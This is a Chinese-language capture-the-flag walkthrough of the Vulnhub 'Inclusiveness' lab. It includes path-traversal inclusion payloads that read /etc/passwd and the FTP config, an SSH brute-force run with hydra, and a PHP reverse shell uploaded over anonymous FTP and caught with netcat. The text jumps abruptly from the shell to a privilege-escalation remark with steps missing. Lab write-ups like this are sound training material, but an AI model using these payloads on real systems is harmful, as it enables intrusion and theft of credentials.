Inclusiveness
識別目標主機IP地址
─(kali?kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:44:49:32 1 60 PCS Systemtechnik GmbH
192.168.56.111 08:00:27:51:1a:1d 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具識別目標主機IP地址為192.168.56.111
NMAP掃描
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.111 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-18 21:55 EDT
Nmap scan report for bogon (192.168.56.111)
Host is up (0.000099s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 0 0 4096 Feb 08 2020 pub [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.230
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 06:1b:a3:92:83:a5:7a:15:bd:40:6e:0c:8d:98:27:7b (RSA)
| 256 cb:38:83:26:1a:9f:d3:5d:d3:fe:9b:a1:d3:bc:ab:2c (ECDSA)
|_ 256 65:54:fc:2d:12:ac:e1:84:78:3e:00:23:fb:e4:c9:ee (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:51:1A:1D (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.29 seconds
NMAP掃描結果表明目標主機有3個開放埠:21(ftp)、22(ssh)、80(http)
獲得Shell
┌──(kali?kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ ftp 192.168.56.111
Connected to 192.168.56.111.
220 (vsFTPd 3.0.3)
Name (192.168.56.111:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||37352|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Feb 08 2020 .
drwxr-xr-x 3 0 0 4096 Feb 08 2020 ..
drwxrwxrwx 2 0 0 4096 Feb 08 2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||40199|)
150 Here comes the directory listing.
drwxrwxrwx 2 0 0 4096 Feb 08 2020 .
drwxr-xr-x 3 0 0 4096 Feb 08 2020 ..
226 Directory send OK.
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||43004|)
150 Ok to send data.
100% |****************************************************************************************************************| 12 229.77 KiB/s 00:00 ETA
226 Transfer complete.
12 bytes sent in 00:00 (14.98 KiB/s)
ftp> pwd
Remote directory: /pub
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||30574|)
150 Here comes the directory listing.
drwxrwxrwx 2 0 0 4096 Apr 19 11:57 pub
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp>
對FTP服務的資訊收集結果如下:
-
目標主機允許匿名訪問
-
匿名用戶允許上傳檔案
-
匿名用戶無法變換目錄
-
FTP服務版本沒有漏洞可利用
──(kali?kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ curl http://192.168.56.111/robots.txt
You are not a search engine! You can't read my robots.txt!
┌──(kali?kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ curl http://192.168.56.111/robots.txt
You are not a search engine! You can't read my robots.txt!
┌──(kali?kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ nikto -h http://192.168.56.111
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.111
+ Target Hostname: 192.168.56.111
+ Target Port: 80
+ Start Time: 2023-04-18 22:01:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 59e071e146cc0, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2023-04-18 22:02:57 (GMT-4) (59 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
接下來做一下目錄掃描:
┌──(kali?kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ gobuster dir -u http://192.168.56.111 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.111
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: js,php,html,txt,sh
[+] Timeout: 10s
===============================================================
2023/04/18 22:04:22 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10701]
/.php (Status: 403) [Size: 279]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.111/manual/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.111/javascript/]
/robots.txt (Status: 200) [Size: 59]
/seo.html (Status: 200) [Size: 59]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/norobots.txt (Status: 200) [Size: 59]
/robots-txt (Status: 200) [Size: 59]
/robots-txt.html (Status: 200) [Size: 59]
/robots-txt.txt (Status: 200) [Size: 59]
/robots-txt.sh (Status: 200) [Size: 59]
/robots-txt.php (Status: 200) [Size: 59]
/robots-txt.js (Status: 200) [Size: 59]
/server-status (Status: 403) [Size: 279]
/valid-robots.txt (Status: 200) [Size: 59]
Progress: 1321170 / 1323366 (99.83%)
===============================================================
2023/04/18 22:09:48 Finished
發現了很多robots.txt等檔案,但是訪問這些檔案,回傳的內容均為:You are not a search engine! You can't read my robots.txt!
但即使用Burpsuite攔截請求,修改User Agent為搜索引擎的UA:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
得到的回傳內容是一樣的
但是其實這個方向是對的,可能修改后的User Agent不能有其他資訊,否則后臺在做匹配的時候匹配不上,將User-agetn改為Googlebot
發現了目錄/secret_information,經過測驗,如果在Googlebot字串另外增加任意字符都可能導致無法得到正確結果,但是其實之前的googlebot的UA是真正的谷歌爬蟲用的UA,也許這是滲透測驗而已,
┌──(kali?kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ curl http://192.168.56.111/secret_information/
<title>zone transfer</title>
<h2>DNS Zone Transfer Attack</h2>
<p><a href='https://www.cnblogs.com/jason-huawen/archive/2023/04/19/?lang=en.php'>english</a> <a href='https://www.cnblogs.com/jason-huawen/archive/2023/04/19/?lang=es.php'>spanish</a></p>
DNS Zone transfer is the process where a DNS server passes a copy of part of it's database (which is called a "zone") to another DNS server. It's how you can have more than one DNS server able to answer queries about a particular zone; there is a Master DNS server, and one or more Slave DNS servers, and the slaves ask the master for a copy of the records for that zone.
A basic DNS Zone Transfer Attack isn't very fancy: you just pretend you are a slave and ask the master for a copy of the zone records. And it sends you them; DNS is one of those really old-school Internet protocols that was designed when everyone on the Internet literally knew everyone else's name and address, and so servers trusted each other implicitly.
It's worth stopping zone transfer attacks, as a copy of your DNS zone may reveal a lot of topological information about your internal network. In particular, if someone plans to subvert your DNS, by poisoning or spoofing it, for example, they'll find having a copy of the real data very useful.
So best practice is to restrict Zone transfers. At the bare minimum, you tell the master what the IP addresses of the slaves are and not to transfer to anyone else. In more sophisticated set-ups, you sign the transfers. So the more sophisticated zone transfer attacks try and get round these controls.
secret_information頁面有鏈接,從URL看可能存在本地檔案包含漏洞
http://192.168.56.111/secret_information/?lang=en.php
──(kali?kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ curl http://192.168.56.111/secret_information/?lang=../../../../../etc/passwd
<title>zone transfer</title>
<h2>DNS Zone Transfer Attack</h2>
<p><a href='https://www.cnblogs.com/jason-huawen/archive/2023/04/19/?lang=en.php'>english</a> <a href='https://www.cnblogs.com/jason-huawen/archive/2023/04/19/?lang=es.php'>spanish</a></p>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
tss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
avahi-autoipd:x:107:114:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:109:115:RealtimeKit,,,:/proc:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
avahi:x:113:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:114:121::/var/lib/saned:/usr/sbin/nologin
colord:x:115:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:116:123::/var/lib/geoclue:/usr/sbin/nologin
tom:x:1000:1000:Tom,,,:/home/tom:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ftp:x:118:125:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
目標主機確實存在本地檔案包含漏洞,接下來就看如何利用本地檔案包含漏洞得到Shell
并且識別出用戶名:tom
┌──(kali?kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ curl http://192.168.56.111/secret_information/?lang=../../../../../home/tom/.ssh/id_rsa
<title>zone transfer</title>
<h2>DNS Zone Transfer Attack</h2>
<p><a href='https://www.cnblogs.com/jason-huawen/archive/2023/04/19/?lang=en.php'>english</a> <a href='https://www.cnblogs.com/jason-huawen/archive/2023/04/19/?lang=es.php'>spanish</a></p>
沒有發現tom用戶的ssh私鑰檔案,
接下來看是否存在遠程檔案包含漏洞
http://192.168.56.111/secret_information/?lang=http://192.168.56.230:8000/test.txt
經過測驗,目標主機并不存在遠程檔案包含漏洞,
看下是否可以暴力破解出tom的密碼
┌──(kali?kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ hydra -l tom -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.111
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-18 22:48:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.111:22/
[STATUS] 141.00 tries/min, 141 tries in 00:01h, 14344260 to do in 1695:33h, 14 active
[STATUS] 98.67 tries/min, 296 tries in 00:03h, 14344105 to do in 2422:60h, 14 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
并沒有破解出ssh的密碼,也沒有破解出ftp的密碼,
接下來將php rerverse代碼通過ftp上傳至目標主機,但是關鍵問題是找到該檔案的絕對路徑,然后通過本地檔案包含漏洞得到shell
┌──(kali?kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ ftp 192.168.56.111
Connected to 192.168.56.111.
220 (vsFTPd 3.0.3)
Name (192.168.56.111:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||5748|)
553 Could not create file.
ftp> cd pub
250 Directory successfully changed.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||13252|)
150 Ok to send data.
100% |****************************************************************************************************************| 5496 43.31 MiB/s 00:00 ETA
226 Transfer complete.
5496 bytes sent in 00:00 (6.80 MiB/s)
ftp> quit
221 Goodbye.
找到shell.php的絕對路徑需要首先查看vsftpd的配置組態檔(前面nmap掃描已經知道ftp服務為vsftpd)
經過查詢一般來說vsftpd的組態檔位置:/etc/vsftpd/vsftpd.conf
但是訪問該位置,并沒有得到相應的回傳:
http://192.168.56.111/secret_information/?lang=../../../../etc/vsftpd/vsftpd.conf
把中間的這級目錄去掉,再次訪問
┌──(kali?kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ curl http://192.168.56.111/secret_information/?lang=../../../../etc/vsftpd.conf
<title>zone transfer</title>
<h2>DNS Zone Transfer Attack</h2>
<p><a href='https://www.cnblogs.com/jason-huawen/archive/2023/04/19/?lang=en.php'>english</a> <a href='https://www.cnblogs.com/jason-huawen/archive/2023/04/19/?lang=es.php'>spanish</a></p>
# Example config file /etc/vsftpd.conf
#
# The default compiled in settings are fairly paranoid. This sample file
# loosens things up a bit, to make the ftp daemon more usable.
# Please see vsftpd.conf.5 for all compiled in defaults.
#
# READ THIS: This example file is NOT an exhaustive list of vsftpd options.
# Please read the vsftpd.conf.5 manual page to get a full idea of vsftpd's
# capabilities.
#
#
# Run standalone? vsftpd can run either from an inetd or as a standalone
# daemon started from an initscript.
anon_umask=000
listen=NO
#
# This directive enables listening on IPv6 sockets. By default, listening
# on the IPv6 "any" address (::) will accept connections from both IPv6
# and IPv4 clients. It is not necessary to listen on *both* IPv4 and IPv6
# sockets. If you want that (perhaps because you want to listen on specific
# addresses) then you must run two copies of vsftpd with two configuration
# files.
listen_ipv6=YES
#
# Allow anonymous FTP? (Disabled by default).
anonymous_enable=YES
#
# Uncomment this to allow local users to log in.
local_enable=YES
#
# Uncomment this to enable any form of FTP write command.
#write_enable=YES
#
# Default umask for local users is 077. You may wish to change this to 022,
# if your users expect that (022 is used by most other ftpd's)
local_umask=022
#
# Uncomment this to allow the anonymous FTP user to upload files. This only
# has an effect if the above global write enable is activated. Also, you will
# obviously need to create a directory writable by the FTP user.
anon_upload_enable=YES
#
# Uncomment this if you want the anonymous FTP user to be able to create
# new directories.
#anon_mkdir_write_enable=YES
#
# Activate directory messages - messages given to remote users when they
# go into a certain directory.
dirmessage_enable=YES
#
# If enabled, vsftpd will display directory listings with the time
# in your local time zone. The default is to display GMT. The
# times returned by the MDTM FTP command are also affected by this
# option.
use_localtime=YES
#
# Activate logging of uploads/downloads.
xferlog_enable=YES
#
# Make sure PORT transfer connections originate from port 20 (ftp-data).
connect_from_port_20=YES
#
# If you want, you can arrange for uploaded anonymous files to be owned by
# a different user. Note! Using "root" for uploaded files is not
# recommended!
#chown_uploads=YES
#chown_username=whoever
#
# You may override where the log file goes if you like. The default is shown
# below.
#xferlog_file=/var/log/vsftpd.log
#
# If you want, you can have your log file in standard ftpd xferlog format.
# Note that the default log file location is /var/log/xferlog in this case.
#xferlog_std_format=YES
#
# You may change the default value for timing out an idle session.
#idle_session_timeout=600
#
# You may change the default value for timing out a data connection.
#data_connection_timeout=120
#
# It is recommended that you define on your system a unique user which the
# ftp server can use as a totally isolated and unprivileged user.
#nopriv_user=ftpsecure
#
# Enable this and the server will recognise asynchronous ABOR requests. Not
# recommended for security (the code is non-trivial). Not enabling it,
# however, may confuse older FTP clients.
#async_abor_enable=YES
#
# By default the server will pretend to allow ASCII mode but in fact ignore
# the request. Turn on the below options to have the server actually do ASCII
# mangling on files when in ASCII mode.
# Beware that on some FTP servers, ASCII support allows a denial of service
# attack (DoS) via the command "SIZE /big/file" in ASCII mode. vsftpd
# predicted this attack and has always been safe, reporting the size of the
# raw file.
# ASCII mangling is a horrible feature of the protocol.
#ascii_upload_enable=YES
#ascii_download_enable=YES
#
# You may fully customise the login banner string:
#ftpd_banner=Welcome to blah FTP service.
#
# You may specify a file of disallowed anonymous e-mail addresses. Apparently
# useful for combatting certain DoS attacks.
#deny_email_enable=YES
# (default follows)
#banned_email_file=/etc/vsftpd.banned_emails
#
# You may restrict local users to their home directories. See the FAQ for
# the possible risks in this before using chroot_local_user or
# chroot_list_enable below.
#chroot_local_user=YES
#
# You may specify an explicit list of local users to chroot() to their home
# directory. If chroot_local_user is YES, then this list becomes a list of
# users to NOT chroot().
# (Warning! chroot'ing can be very dangerous. If using chroot, make sure that
# the user does not have write access to the top level directory within the
# chroot)
#chroot_local_user=YES
#chroot_list_enable=YES
# (default follows)
#chroot_list_file=/etc/vsftpd.chroot_list
#
# You may activate the "-R" option to the builtin ls. This is disabled by
# default to avoid remote users being able to cause excessive I/O on large
# sites. However, some broken FTP clients such as "ncftp" and "mirror" assume
# the presence of the "-R" option, so there is a strong case for enabling it.
#ls_recurse_enable=YES
#
# Customization
#
# Some of vsftpd's settings don't fit the filesystem layout by
# default.
#
# This option should be the name of a directory which is empty. Also, the
# directory should not be writable by the ftp user. This directory is used
# as a secure chroot() jail at times vsftpd does not require filesystem
# access.
secure_chroot_dir=/var/run/vsftpd/empty
#
# This string is the name of the PAM service vsftpd will use.
pam_service_name=vsftpd
#
# This option specifies the location of the RSA certificate to use for SSL
# encrypted connections.
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
ssl_enable=NO
#
# Uncomment this to indicate that vsftpd use a utf8 filesystem.
#utf8_filesystem=YES
#
# Point users at the directory we created earlier.
anon_root=/var/ftp/
write_enable=YES
讀取到vsftpd.conf檔案內容,可知對于匿名用戶的目錄為/var/ftp,然后加上pub,即可訪問到我們上傳的shell.php
http://192.168.56.111/secret_information/?lang=../../../../var/ftp/pub/shell.php
──(kali?kali)-[~/Desktop/Vulnhub/Inclusiveness]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.111] 41434
Linux inclusiveness 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux
13:17:25 up 1:29, 0 users, load average: 0.00, 0.05, 0.28
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@inclusiveness:/$ cd /home
cd /home
www-data@inclusiveness:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Feb 8 2020 .
drwxr-xr-x 19 root root 4.0K Feb 8 2020 ..
drwxr-xr-x 15 tom tom 4.0K Feb 8 2020 tom
讀了一下rootshell.c的內容,發現它是通過whoami這個命令來獲取當前用戶名的,我們可以生成我們自己的whoami,但是這個whomai回傳是tom,這樣rootshell得到的用戶名就是tom
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/550562.html
標籤:其他